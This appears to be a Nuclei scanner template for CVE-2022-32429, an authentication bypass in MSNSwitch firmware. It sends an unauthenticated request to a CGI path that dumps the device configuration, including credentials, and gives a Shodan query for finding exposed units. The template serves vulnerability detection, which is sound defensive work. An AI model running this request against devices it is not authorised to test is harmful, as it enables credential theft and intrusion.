nuclei-templates/cves/2022/CVE-2022-32429.yaml

45 lines
1.3 KiB
YAML

id: CVE-2022-32429
info:
name: MSNSwitch Firmware MNT.2408 - Configuration Dump
author: theabhinavgaur
severity: critical
description: |
The vulnerability is an authentication bypass which allows the full configuration of the unit to be downloaded. The credentials obtained here can then be used via a local subnet vulnerability to obtain a full root shell on the device.
reference:
- https://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html
- https://elifulkerson.com/CVE-2022-32429/
- https://nvd.nist.gov/vuln/detail/CVE-2022-32429
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-32429
cwe-id: CWE-287
metadata:
shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132
verified: "true"
tags: config,dump,packetstorm,cve,cve2022,msmswitch,unauth,switch
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SSID1"
- type: regex
part: header
regex:
- 'filename="Settings(.*).dat'
- 'application/octet-stream'
condition: and
- type: status
status:
- 200